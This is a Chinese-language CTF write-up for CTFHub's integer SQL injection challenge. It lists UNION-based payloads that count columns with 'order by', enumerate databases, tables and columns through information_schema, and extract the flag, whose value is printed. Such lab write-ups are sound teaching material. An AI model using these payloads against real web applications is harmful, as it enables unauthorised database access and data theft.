CTFHUB-SQL注入-整数型注入

整数型注入

考点 SQL注入-整数型注入

分析过程
输入 1试试
1
得到回显结果如上
由于已知是整数型 所以直接判断列数
playload:

?id=1 order by 1
?id=1 order by 1,2
?id=1 order by 1,2,3

2
3
到3时无回显由此得出其有两列
然后查询库名
playload:

?id=-1 union select 1,database()

注:-1就是为了让union前面查询到的数据为空 原回显数据干扰
4
得到库名 此时可以爆出所有的数据库名
playload:

?id=-1 union select 1,group_concat(schema_name) from information_schema.schemata

5
根据库名爆表名
playload:

?id=-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema="sqli"

6
然后去爆flag的字段
playload:

?id=-1 union select 1,group_concat(column_name) from information_schema.columns where table_name="flag"

7
爆出字段可以直接查询数据
playload:

?id=-1 union select 1,group_concat(flag) from sqli.flag

在这里插入图片描述
属于是得到flag

ctfhub{bcaeded8f931341200981ae4}
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值